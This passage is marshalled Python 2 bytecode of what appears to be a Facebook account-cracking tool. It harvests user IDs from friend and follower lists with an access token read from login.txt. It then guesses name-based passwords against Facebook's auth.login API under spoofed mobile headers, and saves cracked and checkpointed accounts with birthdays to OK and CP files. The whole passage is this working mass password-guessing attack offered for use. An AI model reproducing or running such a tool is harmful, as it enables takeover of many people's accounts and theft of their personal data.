----------------------------------------------(\x19\x00\x00\x00R&\x00\x00\x00R\'\x00\x00\x00R2\x00\x00\x00t\x04\x00\x00\x00readR9\x00\x00\x00R4\x00\x00\x00R1\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00R7\x00\x00\x00R:\x00\x00\x00R/\x00\x00\x00R0\x00\x00\x00R(\x00\x00\x00R5\x00\x00\x00R3\x00\x00\x00t\x06\x00\x00\x00publikt\x06\x00\x00\x00methodt\x08\x00\x00\x00followert\x06\x00\x00\x00massalt\x07\x00\x00\x00listdirt\n\x00\x00\x00splitlinest\x07\x00\x00\x00replacet\x03\x00\x00\x00len(\t\x00\x00\x00R;\x00\x00\x00t\x05\x00\x00\x00Bilalt\x03\x00\x00\x00cekt\x04\x00\x00\x00dirst\x04\x00\x00\x00filet\x07\x00\x00\x00Totalokt\x07\x00\x00\x00nm_filet\x07\x00\x00\x00del_txtt\x07\x00\x00\x00Totalcp(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R3\x00\x00\x00s\x00\x00\x00s\xa4\x00\x00\x00\x00\x01\r\x02\x03\x01\x19\x01\r\x01\r\x01\x0e\x01\x03\x01\'\x01\r\x01\r\x01\r\x01\x13\x01\x0e\x03\x07\x01\x05\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x02\x0c\x01\x0c\x01\n\x01\x18\x01\x07\x01\n\x01\x18\x01\x07\x01\n\x01\x18\x01\x07\x01\n\x01\x18\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\x0f\x01\x05\x01\r\x01\r\x01\x03\x01\x0c\x01\x0c\x01\n\x01 \x01\r\x01\x12\x01\x16\x01\x12\x01\x05\x01\x15\x01\x11\x01\x05\x01\r\x01\x0c\x01\x0f\x01\x05\x01\r\x01\r\x01\x03\x01\x0c\x01\x0c\x01\n\x01 \x01\r\x01\x12\x01\x16\x01\x12\x01\x05\x01\x15\x01\x11\x01\x05\x01\r\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xdc\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn\x1b\x00\x04t\x03\x00k\n\x00r6\x00\x01\x01\x01t\x04\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xt\x05\x00d\x04\x00\x83\x01\x00}\x00\x00yh\x00xa\x00t\x06\x00j\x07\x00d\x05\x00|\x00\x00t\x02\x00f\x02\x00\x16\x83\x01\x00j\x08\x00\x83\x00\x00d\x06\x00\x19D]<\x00}\x01\x00|\x01\x00d\x07\x00\x19}\x02\x00|\x01\x00d\x08\x00\x19j\t\x00d\t\x00\x83\x01\x00d\n\x00\x19}\x03\x00t\n\x00j\x0b\x00|\x02\x00d\x0b\x00\x17|\x03\x00\x17\x83\x01\x00\x01qj\x00WWn\x1b\x00\x04t\x0c\x00k\n\x00r\xc8\x00\x01\x01\x01t\x04\x00d\x0c\x00\x83\x01\x00\x01n\x01\x00Xd\r\x00t\r\x00t\n\x00\x83\x01\x00\x16GHd\x00\x00S(\x0e\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s%\x00\x00\x00\n\x1b[1;96m[\x1b[1;93m!\x1b[1;96m] Token Errors%\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Target Id : s5\x00\x00\x00https://graph.facebook.com/%s/friends?access_token=%st\x04\x00\x00\x00datat\x02\x00\x00\x00idR+\x00\x00\x00RA\x00\x00\x00i\x00\x00\x00\x00s\x03\x00\x00\x00<=>s6\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Account friend list is not publics5\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Total Id : \x1b[0;91m%s\x1b[0;97m(\x0e\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R9\x00\x00\x00R:\x00\x00\x00R1\x00\x00\x00R5\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00t\x06\x00\x00\x00rsplitRW\x00\x00\x00t\x06\x00\x00\x00appendR4\x00\x00\x00RM\x00\x00\x00(\x04\x00\x00\x00t\x03\x00\x00\x00idtt\x01\x00\x00\x00it\x03\x00\x00\x00uidR;\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RF\x00\x00\x00\xcb\x00\x00\x00s\x1a\x00\x00\x00\x00\x02\x03\x01\x19\x01\r\x01\x0e\x01\x0c\x01\x03\x01*\x01\n\x01\x17\x01\x1d\x01\r\x01\x0e\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xdc\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn\x1b\x00\x04t\x03\x00k\n\x00r6\x00\x01\x01\x01t\x04\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xt\x05\x00d\x04\x00\x83\x01\x00}\x00\x00yh\x00xa\x00t\x06\x00j\x07\x00d\x05\x00|\x00\x00t\x02\x00f\x02\x00\x16\x83\x01\x00j\x08\x00\x83\x00\x00d\x06\x00\x19D]<\x00}\x01\x00|\x01\x00d\x07\x00\x19}\x02\x00|\x01\x00d\x08\x00\x19j\t\x00d\t\x00\x83\x01\x00d\n\x00\x19}\x03\x00t\n\x00j\x0b\x00|\x02\x00d\x0b\x00\x17|\x03\x00\x17\x83\x01\x00\x01qj\x00WWn\x1b\x00\x04t\x0c\x00k\n\x00r\xc8\x00\x01\x01\x01t\x04\x00d\x0c\x00\x83\x01\x00\x01n\x01\x00Xd\r\x00t\r\x00t\n\x00\x83\x01\x00\x16GHd\x00\x00S(\x0e\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s%\x00\x00\x00\n\x1b[1;96m[\x1b[1;94m+\x1b[1;96m] Token Errors%\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Target Id : sD\x00\x00\x00https://graph.facebook.com/%s/subscribers?limit=5000&access_token=%sRV\x00\x00\x00RW\x00\x00\x00R+\x00\x00\x00RA\x00\x00\x00i\x00\x00\x00\x00s\x03\x00\x00\x00<=>s6\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Account friend list is not publics5\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Total Id : \x1b[0;91m%s\x1b[0;97m(\x0e\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R9\x00\x00\x00R:\x00\x00\x00R1\x00\x00\x00R5\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00RX\x00\x00\x00RW\x00\x00\x00RY\x00\x00\x00R4\x00\x00\x00RM\x00\x00\x00(\x04\x00\x00\x00RZ\x00\x00\x00R[\x00\x00\x00R\\\x00\x00\x00R;\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RH\x00\x00\x00\xdb\x00\x00\x00s\x1a\x00\x00\x00\x00\x02\x03\x01\x19\x01\r\x01\x0e\x01\x0c\x01\x03\x01*\x01\n\x01\x17\x01\x1d\x01\r\x01\x0e\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s"\x01\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn\x1b\x00\x04t\x03\x00k\n\x00r6\x00\x01\x01\x01t\x04\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xy\x16\x00t\x05\x00t\x06\x00d\x04\x00\x83\x01\x00\x83\x01\x00}\x00\x00Wn\r\x00\x01\x01\x01d\x05\x00}\x00\x00n\x01\x00Xx\xaf\x00t\x07\x00|\x00\x00\x83\x01\x00D]\xa1\x00}\x01\x00|\x01\x00d\x05\x007}\x01\x00t\x08\x00d\x06\x00|\x01\x00\x16\x83\x01\x00}\x02\x00yh\x00xa\x00t\t\x00j\n\x00d\x07\x00|\x02\x00t\x02\x00f\x02\x00\x16\x83\x01\x00j\x0b\x00\x83\x00\x00d\x08\x00\x19D]<\x00}\x03\x00|\x03\x00d\t\x00\x19}\x04\x00t\x0c\x00d\n\x00\x19j\r\x00d\x0b\x00\x83\x01\x00d\x0c\x00\x19}\x05\x00t\x0e\x00j\x0f\x00|\x04\x00d\r\x00\x17|\x05\x00\x17\x83\x01\x00\x01q\xb1\x00WWqj\x00\x04t\x10\x00k\n\x00r\n\x01\x01\x01\x01d\x0e\x00GHqj\x00Xqj\x00Wd\x0f\x00t\x11\x00t\x0e\x00\x83\x01\x00\x16GHd\x00\x00S(\x10\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s$\x00\x00\x00\x1b[1;96m[\x1b[1;94m+\x1b[1;96m] Token Errors1\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Enter Multiple ID Option : i\x01\x00\x00\x00s&\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Target Id %s : s5\x00\x00\x00https://graph.facebook.com/%s/friends?access_token=%sRV\x00\x00\x00RW\x00\x00\x00R+\x00\x00\x00RA\x00\x00\x00i\x00\x00\x00\x00s\x03\x00\x00\x00<=>s3\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Ids friend list Is not publics1\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Total id : \x1b[0;92m%s\x1b[0;96m(\x12\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R9\x00\x00\x00R:\x00\x00\x00R1\x00\x00\x00t\x03\x00\x00\x00intt\x05\x00\x00\x00inputt\x05\x00\x00\x00rangeR5\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00t\x01\x00\x00\x00nRX\x00\x00\x00RW\x00\x00\x00RY\x00\x00\x00R4\x00\x00\x00RM\x00\x00\x00(\x06\x00\x00\x00t\x0b\x00\x00\x00tanya_Totalt\x01\x00\x00\x00tRZ\x00\x00\x00R[\x00\x00\x00R\\\x00\x00\x00R;\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RI\x00\x00\x00\xeb\x00\x00\x00s&\x00\x00\x00\x00\x02\x03\x01\x19\x01\r\x01\x0e\x01\x03\x01\x16\x01\x03\x00\n\x01\x13\x01\n\x01\x10\x01\x03\x01*\x01\n\x01\x17\x01\x1d\x01\r\x01\r\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x01\x00\x00d\x01\x00GHd\x02\x00GHd\x03\x00GHd\x04\x00GHt\x00\x00d\x05\x00\x83\x01\x00}\x00\x00|\x00\x00d\x06\x00k\x02\x00r6\x00t\x01\x00\x83\x00\x00\x01n\t\x01|\x00\x00d\x07\x00k\x02\x00r\x8c\x00t\x00\x00d\x08\x00\x83\x01\x00}\x01\x00|\x01\x00d\t\x00k\x02\x00rd\x00t\x02\x00\x83\x00\x00\x01n\x00\x00d\n\x00GHt\x03\x00d\x0b\x00\x83\x01\x00j\x04\x00t\x05\x00t\x06\x00\x83\x02\x00\x01t\x07\x00d\x0c\x00\x83\x01\x00\x01n\xb3\x00|\x00\x00d\r\x00k\x02\x00r\xe2\x00t\x00\x00d\x0e\x00\x83\x01\x00}\x01\x00|\x01\x00d\t\x00k\x02\x00r\xba\x00t\x02\x00\x83\x00\x00\x01n\x00\x00d\n\x00GHt\x03\x00d\x0b\x00\x83\x01\x00j\x04\x00t\x08\x00t\x06\x00\x83\x02\x00\x01t\x07\x00d\x0c\x00\x83\x01\x00\x01n]\x00|\x00\x00d\x0f\x00k\x02\x00r8\x01t\x00\x00d\x10\x00\x83\x01\x00}\x01\x00|\x01\x00d\t\x00k\x02\x00r\x10\x01t\x02\x00\x83\x00\x00\x01n\x00\x00d\n\x00GHt\x03\x00d\x0b\x00\x83\x01\x00j\x04\x00t\t\x00t\x06\x00\x83\x02\x00\x01t\x07\x00d\x0c\x00\x83\x01\x00\x01n\x07\x00t\x01\x00\x83\x00\x00\x01d\x00\x00S(\x11\x00\x00\x00NsM\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Choose crack methode [ \x1b[1;92mRecommended B-API \x1b[1;97m]sT\x00\x00\x00\x1b[1;96m[\x1b[1;93m1\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80 \x1b[1;97mB-API\x1b[1;97m [ \x1b[1;95mFast \x1b[1;97m]sV\x00\x00\x00\x1b[1;96m[\x1b[1;93m2\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80 \x1b[1;97mM-Basic\x1b[1;97m [ \x1b[1;95mFast \x1b[1;97m]s^\x00\x00\x00\x1b[1;96m[\x1b[1;93m3\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80 \x1b[1;97mFree Facebook\x1b[1;97m [ \x1b[1;95mNormal \x1b[1;97m]s;\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80 \x1b[1;97mOption : R*\x00\x00\x00R=\x00\x00\x00s`\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Do you choose manual passwors ? y/t\x1b[1;97m [ \x1b[1;92mDefault : t \x1b[1;97m] : t\x01\x00\x00\x00yRA\x00\x00\x00i\x1e\x00\x00\x00s\x0b\x00\x00\x00Program EndR>\x00\x00\x00s^\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Do you choose manual passwords y/t\x1b[1;97m [ \x1b[1;92mDefault : t \x1b[1;97m] R?\x00\x00\x00sg\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4[\x1b[1;94m!\x1b[1;97m] Do you choose manual passwords y/t\x1b[1;97m [ \x1b[1;92mDefault : t \x1b[1;97m] (\n\x00\x00\x00R5\x00\x00\x00R3\x00\x00\x00t\x06\x00\x00\x00manualR\x00\x00\x00\x00t\x03\x00\x00\x00mapt\x04\x00\x00\x00bapiRW\x00\x00\x00R1\x00\x00\x00t\x06\x00\x00\x00mbasict\x06\x00\x00\x00mobile(\x02\x00\x00\x00RG\x00\x00\x00t\x03\x00\x00\x00ask(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RG\x00\x00\x00\x00\x01\x00\x00s:\x00\x00\x00\x00\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\x05\x01\x16\x01\r\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\x05\x01\x16\x01\r\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\x05\x01\x16\x01\r\x02c\x02\x00\x00\x00\t\x00\x00\x00\x0b\x00\x00\x00C\x00\x00\x00s\x01\x01\x00\x00y\xcf\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x02\x00t\x02\x00j\x03\x00\x83\x00\x00\x8f\xa8\x00}\x03\x00|\x03\x00j\x04\x00d\x03\x00|\x00\x00|\x02\x00f\x02\x00\x16\x83\x01\x00j\x05\x00\x83\x00\x00d\x04\x00\x19}\x04\x00|\x04\x00j\x06\x00d\x05\x00\x83\x01\x00\\\x03\x00}\x05\x00}\x06\x00}\x07\x00t\x07\x00|\x05\x00\x19}\x05\x00d\x06\x00|\x00\x00|\x01\x00|\x06\x00|\x05\x00|\x07\x00f\x05\x00\x16GHt\x08\x00j\t\x00d\x07\x00|\x00\x00|\x01\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00d\x08\x00t\n\x00\x16d\t\x00\x83\x02\x00j\x0b\x00d\n\x00|\x00\x00|\x01\x00|\x06\x00|\x05\x00|\x07\x00f\x05\x00\x16\x83\x01\x00\x01Wd\x00\x00QXWn+\x00\x04t\x0c\x00k\n\x00r\xf6\x00\x01}\x08\x00\x01d\x0b\x00}\x06\x00d\x0b\x00}\x05\x00d\x0b\x00}\x07\x00n\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x0c\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s-\x00\x00\x00https://graph.facebook.com/%s?access_token=%st\x08\x00\x00\x00birthdayt\x01\x00\x00\x00/s+\x00\x00\x00\r\x1b[0;96m[RAKA_AMANDA] %s|%s|%s %s %s\x1b[0;96ms\x05\x00\x00\x00%s|%ss\t\x00\x00\x00CP/%s.txtt\x01\x00\x00\x00as\x12\x00\x00\x00 + %s|%s|%s %s %s\nRA\x00\x00\x00(\r\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R-\x00\x00\x00t\x07\x00\x00\x00SessionR.\x00\x00\x00R6\x00\x00\x00t\x05\x00\x00\x00splitt\t\x00\x00\x00bulan_ttlt\x02\x00\x00\x00cpRY\x00\x00\x00t\x07\x00\x00\x00tanggalR\x12\x00\x00\x00R4\x00\x00\x00(\t\x00\x00\x00R\\\x00\x00\x00t\x02\x00\x00\x00pwR9\x00\x00\x00t\x03\x00\x00\x00sest\x03\x00\x00\x00ttlt\x05\x00\x00\x00montht\x03\x00\x00\x00dayt\x04\x00\x00\x00yearR:\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\n\x00\x00\x00cek_ttl_cp \x01\x00\x00s\x1e\x00\x00\x00\x00\x01\x03\x01\x15\x01\x0f\x01#\x01\x18\x01\n\x01\x18\x01\x17\x017\x01\x0f\x01\x06\x01\x06\x01\t\x01\x03\x00c\x01\x00\x00\x00\t\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s\x0e\x03\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x01\x00Wn#\x00\x04t\x02\x00k\n\x00r>\x00\x01\x01\x01d\x03\x00}\x01\x00d\x04\x00}\x01\x00d\x05\x00}\x01\x00n\x01\x00Xt\x03\x00j\x04\x00j\x05\x00d\x06\x00t\x06\x00t\x07\x00t\x08\x00\x83\x01\x00t\x07\x00t\t\x00\x83\x01\x00t\x07\x00t\n\x00\x83\x01\x00f\x04\x00\x16\x83\x01\x00\x01t\x03\x00j\x04\x00j\x0b\x00\x83\x00\x00\x01|\x00\x00j\x0c\x00d\x07\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00t\x07\x00|\x03\x00\x83\x01\x00d\x08\x00k\x05\x00r\xc6\x00|\x03\x00|\x03\x00d\t\x00\x17|\x03\x00d\n\x00\x17|\x03\x00d\x0b\x00\x17g\x04\x00}\x04\x00n{\x00t\x07\x00|\x03\x00\x83\x01\x00d\x0c\x00k\x01\x00r\xf6\x00|\x03\x00d\r\x00\x17|\x03\x00d\x0e\x00\x17|\x03\x00d\x0f\x00\x17g\x03\x00}\x04\x00nK\x00t\x07\x00|\x03\x00\x83\x01\x00d\x10\x00k\x01\x00r&\x01|\x03\x00d\x11\x00\x17|\x03\x00d\n\x00\x17|\x03\x00d\x0b\x00\x17g\x03\x00}\x04\x00n\x1b\x00|\x03\x00d\x0b\x00\x17|\x03\x00d\x0e\x00\x17|\x03\x00d\x0f\x00\x17g\x03\x00}\x04\x00y\xbf\x01x\xae\x01|\x04\x00D]\xa6\x01}\x05\x00|\x05\x00j\r\x00\x83\x00\x00}\x05\x00t\x0e\x00j\x0f\x00\x83\x00\x00}\x06\x00i\x08\x00t\x10\x00t\x11\x00j\x12\x00d\x12\x00d\x13\x00\x83\x02\x00\x83\x01\x00d\x14\x006t\x10\x00t\x11\x00j\x12\x00d\x15\x00d\x16\x00\x83\x02\x00\x83\x01\x00d\x17\x006t\x10\x00t\x11\x00j\x12\x00d\x15\x00d\x16\x00\x83\x02\x00\x83\x01\x00d\x18\x006d\x19\x00d\x1a\x006d\x1b\x00d\x1c\x006|\x01\x00d\x1d\x006d\x1e\x00d\x1f\x006d \x00d!\x006}\x07\x00|\x06\x00j\x13\x00d"\x00t\x10\x00|\x02\x00\x83\x01\x00\x17d#\x00\x17t\x10\x00|\x05\x00\x83\x01\x00\x17d$\x00\x17d%\x00|\x07\x00\x83\x01\x01}\x08\x00d&\x00|\x08\x00j\x14\x00k\x06\x00r\x8a\x02d\'\x00|\x08\x00j\x14\x00k\x06\x00r\x8a\x02d(\x00|\x02\x00|\x05\x00|\x08\x00j\x15\x00\x83\x00\x00d)\x00\x19f\x03\x00\x16GHt\t\x00j\x16\x00d*\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00d+\x00t\x17\x00\x16d,\x00\x83\x02\x00j\x05\x00d-\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01PqK\x01qK\x01d.\x00|\x08\x00j\x15\x00\x83\x00\x00d/\x00\x19k\x06\x00rK\x01d0\x00|\x02\x00|\x05\x00f\x02\x00\x16GHt\n\x00j\x16\x00d*\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00d1\x00t\x17\x00\x16d,\x00\x83\x02\x00j\x05\x00d-\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01PqK\x01qK\x01qK\x01Wt\x06\x00d2\x007a\x06\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(3\x00\x00\x00Ns\x03\x00\x00\x00.uaR)\x00\x00\x00s\xcc\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]s\x1f\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/323.0.0.46.119;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]s|\x00\x00\x00NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420;]s\\\x00\x00\x00\r\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4 \x1b[0;92mCRACK \x1b[0;93m\xe2\x80\xa2\xe2\x80\xa2>\x1b[0;95m %s/%s \xe2\x80\xa2\xe2\x80\xa2> [OK:-%s] \xc2\xae \x1b[0;95m[CP:-%s] s\x03\x00\x00\x00<=>i\x06\x00\x00\x00R=\x00\x00\x00R$\x00\x00\x00t\x03\x00\x00\x00123i\x02\x00\x00\x00R?\x00\x00\x00t\x04\x00\x00\x001234t\x05\x00\x00\x0012345i\x03\x00\x00\x00R>\x00\x00\x00g\x00\x00\x00\x00\xd0\x12sAg\x00\x00\x00\x008\x9c|As\x19\x00\x00\x00x-fb-connection-bandwidthi N\x00\x00i@\x9c\x00\x00s\x0c\x00\x00\x00x-fb-sim-hnis\x0c\x00\x00\x00x-fb-net-hnit\t\x00\x00\x00EXCELLENTs\x17\x00\x00\x00x-fb-connection-qualitys!\x00\x00\x00cell.CTRadioAccessTechnologyHSDPAs\x14\x00\x00\x00x-fb-connection-types\n\x00\x00\x00user-agents!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-typet\x05\x00\x00\x00Ligers\x10\x00\x00\x00x-fb-http-engines?\x00\x00\x00https://b-api.facebook.com/method/auth.login?format=json&email=s\n\x00\x00\x00&password=s\xae\x01\x00\x00&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&meta_inf_fbmeta=%20¤tly_logged_in_userid=0&method=GET&locale=en_US&client_country_code=US&fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate&cpl=truet\x07\x00\x00\x00headerst\x0b\x00\x00\x00session_keyt\x04\x00\x00\x00EAAAs%\x00\x00\x00\r\x1b[0;92m[RAKA_AMANDA] %s|%s|%s\x1b[0;97mt\x0c\x00\x00\x00access_tokens\x05\x00\x00\x00%s|%ss\t\x00\x00\x00OK/%s.txtRl\x00\x00\x00s\t\x00\x00\x00 + %s|%s\ns\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs*\x00\x00\x00\r\x1b[0;96m[RAKA_AMANDA] %s|%s\x1b[0;96m s\t\x00\x00\x00CP/%s.txti\x01\x00\x00\x00(\x18\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R:\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00t\x04\x00\x00\x00loopRM\x00\x00\x00RW\x00\x00\x00t\x02\x00\x00\x00okRp\x00\x00\x00R\x13\x00\x00\x00Rn\x00\x00\x00R7\x00\x00\x00R-\x00\x00\x00Rm\x00\x00\x00t\x03\x00\x00\x00strt\x06\x00\x00\x00randomt\x07\x00\x00\x00randintR.\x00\x00\x00t\x04\x00\x00\x00textR6\x00\x00\x00RY\x00\x00\x00t\x07\x00\x00\x00tBilall(\t\x00\x00\x00t\x04\x00\x00\x00usert\x02\x00\x00\x00uaR\\\x00\x00\x00R+\x00\x00\x00t\x03\x00\x00\x00pwxRr\x00\x00\x00Rs\x00\x00\x00t\x08\x00\x00\x00headers_t\x04\x00\x00\x00send(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rf\x00\x00\x000\x01\x00\x00sL\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x06\x01\x06\x01\n\x02\t\x01)\x01\r\x01\x15\x01\x12\x01!\x01\x12\x01\x1e\x01\x12\x01\x1e\x02\x1b\x01\x03\x01\r\x01\x0c\x01\x0c\x01t\x011\x01\x1e\x01\x1c\x01\x17\x01$\x01\x01\x01\x06\x01\x16\x01\x0f\x01\x17\x01$\x01\x01\x01\n\x02\x0e\x01\x03\x01c\x01\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00s\xfb\x03\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x01\x00Wn\x1d\x00\x04t\x02\x00k\n\x00r8\x00\x01\x01\x01d\x03\x00}\x01\x00d\x04\x00}\x01\x00n\x01\x00Xt\x03\x00j\x04\x00j\x05\x00d\x05\x00t\x06\x00t\x07\x00t\x08\x00\x83\x01\x00t\x07\x00t\t\x00\x83\x01\x00t\x07\x00t\n\x00\x83\x01\x00f\x04\x00\x16\x83\x01\x00\x01t\x03\x00j\x04\x00j\x0b\x00\x83\x00\x00\x01|\x00\x00j\x0c\x00d\x06\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00t\x07\x00|\x03\x00\x83\x01\x00d\x07\x00k\x05\x00r\xc0\x00|\x03\x00|\x03\x00d\x08\x00\x17|\x03\x00d\t\x00\x17|\x03\x00d\n\x00\x17g\x04\x00}\x04\x00nm\x00t\x07\x00|\x03\x00\x83\x01\x00d\x0b\x00k\x01\x00r\xf0\x00|\x03\x00d\x08\x00\x17|\x03\x00d\t\x00\x17|\x03\x00d\n\x00\x17g\x03\x00}\x04\x00n=\x00t\x07\x00|\x03\x00\x83\x01\x00d\x0c\x00k\x01\x00r\x19\x01|\x03\x00d\x08\x00\x17|\x03\x00d\n\x00\x17g\x02\x00}\x04\x00n\x14\x00|\x03\x00d\x08\x00\x17|\x03\x00d\n\x00\x17g\x02\x00}\x04\x00y\xc0\x02x\xaf\x02|\x04\x00D]\xa7\x02}\x05\x00i\x00\x00}\x06\x00|\x05\x00j\r\x00\x83\x00\x00}\x05\x00t\x0e\x00j\x0f\x00\x83\x00\x00}\x07\x00|\x07\x00j\x10\x00j\x11\x00i\n\x00d\r\x00d\x0e\x006d\x0f\x00d\x10\x006d\x11\x00d\x12\x006d\x13\x00d\x14\x006|\x01\x00d\x15\x006d\x16\x00d\x17\x006d\x18\x00d\x19\x006d\x1a\x00d\x1b\x006d\x1c\x00d\x1d\x006d\x1e\x00d\x1f\x006\x83\x01\x00\x01|\x07\x00j\x12\x00d 